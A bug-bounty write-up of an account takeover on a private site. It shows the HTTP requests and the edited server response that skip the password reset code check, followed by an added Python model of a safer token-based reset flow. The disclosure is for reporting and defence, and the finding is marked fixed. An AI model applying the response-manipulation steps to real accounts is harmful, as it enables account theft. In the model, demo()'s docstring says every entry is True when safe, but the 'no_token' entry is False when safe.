Hi everyone, here is one of my write-ups on account takeover via the password reset functionality. As the site is private, let's assume it is site.com.
So basically, the password reset workflow is as follows:
- The user requests a password reset
- A 12-character alphanumeric code is sent to the registered email id
- The user has to provide the correct code, then the application asks them to set a new password
So let's start.
To reset the password, the user needs to visit https://site.com/forgetpassword
The form below will appear:
So here, let's say we use the victim's email id victim@site.com and request a password reset.
After that, the screen below appears; here we need to enter the correct code to reset the password. The code is 12 characters long, so there is no way to brute-force it.
So here I used some random code like "hacker", and I saw that there is no validation of the code length.
Here is the code validation request:
POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: http://site.com/forgotpassword
Cookie: bla=bla;
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==
Here is the response:
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
<div class="Loginerror low_margin" style="margin: 20px auto -25px !important;">The Password reset code entered by you is either invalid or has expired.</div>
After that, I provided the correct code to analyse the back-end validation.
For a correct code, the response body just changed like this:
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("")})
</script>
So as you can see, all the response does is fill in the prcemailid2 value, which we can get from the first request:
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR
So in the response body you just need to replace the script with the code below:
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
So the final response will be like this:
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
Boom, now the screen below appears.
Now provide the new password, confirm the new password and submit the request; the password is changed successfully. Navigate to the login panel and log in with the new password.
Successfully owned the account.
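As an added example (not code from the write-up and not site.com's own code), here is a small Python model of how the server side of this flow should behave so that the response manipulation shown above has nothing to act on: the browser never carries the proof that the code was verified, the server does, in the form of a random, single-use, expiring reset-session token that is issued only after a correct code. The names ResetService, request_reset, verify_code and set_password, the TTL values and the attempt limit are assumptions of this example.

```python
# Added example: a server-side password reset flow in which the set-password
# step trusts only a server-issued token, never a client-supplied identifier.
# All names and limits below are assumptions, not the site's real code.
import hmac
import secrets
import string
import time
from dataclasses import dataclass, field
from hashlib import sha256
from typing import Callable, Dict, Optional

CODE_ALPHABET = string.ascii_uppercase + string.digits
CODE_LENGTH = 12             # the write-up's 12-character alphanumeric code
CODE_TTL_SECONDS = 15 * 60   # assumed lifetime of an emailed code
SESSION_TTL_SECONDS = 10 * 60  # assumed lifetime of the post-verification token
MAX_ATTEMPTS = 5             # assumed guess limit per issued code


@dataclass
class PendingReset:
    code_hash: bytes      # only a hash of the code is stored server-side
    expires_at: float
    attempts: int = 0


@dataclass
class ResetSession:
    email: str
    expires_at: float


@dataclass
class ResetService:
    users: Dict[str, str]                                   # email -> password hash
    pending: Dict[str, PendingReset] = field(default_factory=dict)
    sessions: Dict[str, ResetSession] = field(default_factory=dict)
    clock: Callable[[], float] = time.time                  # injectable for tests

    def request_reset(self, email: str) -> Optional[str]:
        """Step 1: issue a code (returned here so the caller can 'mail' it).
        Unknown emails get None rather than an error, to avoid enumeration."""
        if email not in self.users:
            return None
        code = "".join(secrets.choice(CODE_ALPHABET) for _ in range(CODE_LENGTH))
        self.pending[email] = PendingReset(
            code_hash=sha256(code.encode()).digest(),
            expires_at=self.clock() + CODE_TTL_SECONDS,
        )
        return code

    def verify_code(self, email: str, code: str) -> Optional[str]:
        """Step 2: check the code. Returns a reset-session token on success,
        None on any failure. The token, not the email, is what step 3 needs."""
        # Reject anything that cannot be a real code before touching state
        # (this is the length/format validation the write-up found missing).
        if len(code) != CODE_LENGTH or any(c not in CODE_ALPHABET for c in code):
            return None
        pr = self.pending.get(email)
        if pr is None or self.clock() > pr.expires_at:
            self.pending.pop(email, None)
            return None
        pr.attempts += 1
        if pr.attempts > MAX_ATTEMPTS:
            del self.pending[email]
            return None
        if not hmac.compare_digest(pr.code_hash, sha256(code.encode()).digest()):
            return None
        del self.pending[email]                 # a code is single-use
        token = secrets.token_urlsafe(32)
        self.sessions[token] = ResetSession(email, self.clock() + SESSION_TTL_SECONDS)
        return token

    def set_password(self, token: str, new_password: str) -> bool:
        """Step 3: only a valid, unexpired, unused session token may change a
        password. Any identifier the form also carries is simply ignored."""
        sess = self.sessions.pop(token, None)   # consume it even if expired
        if sess is None or self.clock() > sess.expires_at:
            return False
        # sha256 stands in for a real password hash (argon2/bcrypt) here.
        self.users[sess.email] = sha256(new_password.encode()).hexdigest()
        return True


def demo() -> Dict[str, bool]:
    """Walk the flow once; each entry is True when the service behaved safely."""
    svc = ResetService(users={"victim@site.com": "old-hash"})   # constructed user
    code = svc.request_reset("victim@site.com")
    r: Dict[str, bool] = {}
    # Going straight to step 3 with a derived identifier: no server-issued token exists.
    r["no_token"] = svc.set_password("victim@site.com", "pwned")
    r["garbage_code"] = svc.verify_code("victim@site.com", "hacker") is None
    token = svc.verify_code("victim@site.com", code)
    r["good_code"] = token is not None
    r["replay_code"] = svc.verify_code("victim@site.com", code) is None
    r["set_ok"] = svc.set_password(token, "new-strong-password")
    r["token_reuse"] = svc.set_password(token, "again") is False
    return r


def expiry_check() -> bool:
    """A correct code presented after CODE_TTL_SECONDS must be refused."""
    now = [1_000_000.0]
    svc = ResetService(users={"a@site.com": "h"}, clock=lambda: now[0])
    code = svc.request_reset("a@site.com")
    now[0] += CODE_TTL_SECONDS + 1
    return svc.verify_code("a@site.com", code) is None


if __name__ == "__main__":
    print(demo(), expiry_check())
```

Two points carry the weight here. The format check at the top of verify_code is the missing length validation noted above: a value like "hacker" is rejected before any lookup. More importantly, the hidden-field pattern from the write-up is replaced by a token the server generated and stored itself, so editing the validation response to fill in prcemailid2 would give the browser nothing the server recognises; the set-password handler only honours tokens it issued after a correct code, and it consumes them on first use. Failed verify_code calls are also the natural place to emit a log line for detection of guessing against a single account.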
Status: Fixed
Bounty rewarded